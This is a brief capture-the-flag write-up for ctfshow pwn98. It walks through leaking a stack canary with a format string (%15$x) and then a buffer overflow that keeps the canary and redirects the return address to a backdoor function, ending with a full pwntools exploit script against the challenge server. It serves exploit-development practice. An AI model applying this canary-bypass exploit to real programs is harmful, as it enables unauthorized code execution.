ctfshow pwn98
From the challenge description: "Canary? Is there a way to bypass it?" So we know there is a stack canary.
Open the binary in IDA.
There is a format string vulnerability.
Compute the offset.
The format string offset is 5. Next, the distance from s to the return address is 0x34, so (0x34 - canary_offset)/4 + 5 = a, where a is the final offset. If you are not familiar with canaries, see this article.
- Next, find the canary.
a = (0x34 - 0x0c)/4 + 5 = 15
Start writing the exp.
```python
from pwn import *

#r = process('./pwn')
r = remote("pwn.challenge.ctf.show", 28195)
getshell = 0x80486ce  # address of the backdoor function

# Step 1: leak the canary with the format string bug.
# The canary sits at parameter index 15 (offset 5 + (0x34 - 0xc)/4).
payload_1 = b'%15$x'
r.recv()
r.sendline(payload_1)
canary = int(r.recv(), 16)  # canary = int(r.recv(8), 16)
print(hex(canary))

# Step 2: overflow s, keep the canary intact, then overwrite the return address.
# Layout: 0x28 bytes of padding, canary (4 bytes), 0xc bytes up to ret, target address.
payload_2 = b'a' * (0x34 - 0xc) + p32(canary) + b'a' * 0xc + p32(getshell)
r.send(payload_2)
r.interactive()
```

We get the flag.